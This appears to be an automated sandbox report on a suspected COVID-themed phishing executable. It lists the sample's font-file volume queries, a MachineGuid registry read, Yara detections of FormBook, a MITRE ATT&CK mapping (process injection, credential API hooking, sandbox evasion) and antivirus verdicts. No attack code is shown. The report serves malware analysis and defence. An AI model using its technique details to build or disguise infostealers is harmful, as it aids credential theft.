Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.616862762.0000000000B70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.298199420.00000000013B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.256080598.000000000406F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.Po-covid19 2372#w2..exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Po-covid19 2372#w2..exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.616862762.0000000000B70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.298199420.00000000013B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.256080598.000000000406F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.Po-covid19 2372#w2..exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Po-covid19 2372#w2..exe.400000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	DLL Side-Loading1	Process Injection612	Rootkit1	Credential API Hooking1	Security Software Discovery221	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	DLL Side-Loading1	Masquerading1	LSASS Memory	Virtualization/Sandbox Evasion3	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion3	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Disable or Modify Tools1	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection612	LSA Secrets	System Information Discovery112	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Deobfuscate/Decode Files or Information1	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information4	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing23	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	DLL Side-Loading1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label
Po-covid19 2372#w2..exe	27%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
Po-covid19 2372#w2..exe	100%	Avira	HEUR/AGEN.1120329
Po-covid19 2372#w2..exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
3.2.Po-covid19 2372#w2..exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
3.0.Po-covid19 2372#w2..exe.9b0000.0.unpack	100%	Avira	HEUR/AGEN.1120329	Download File
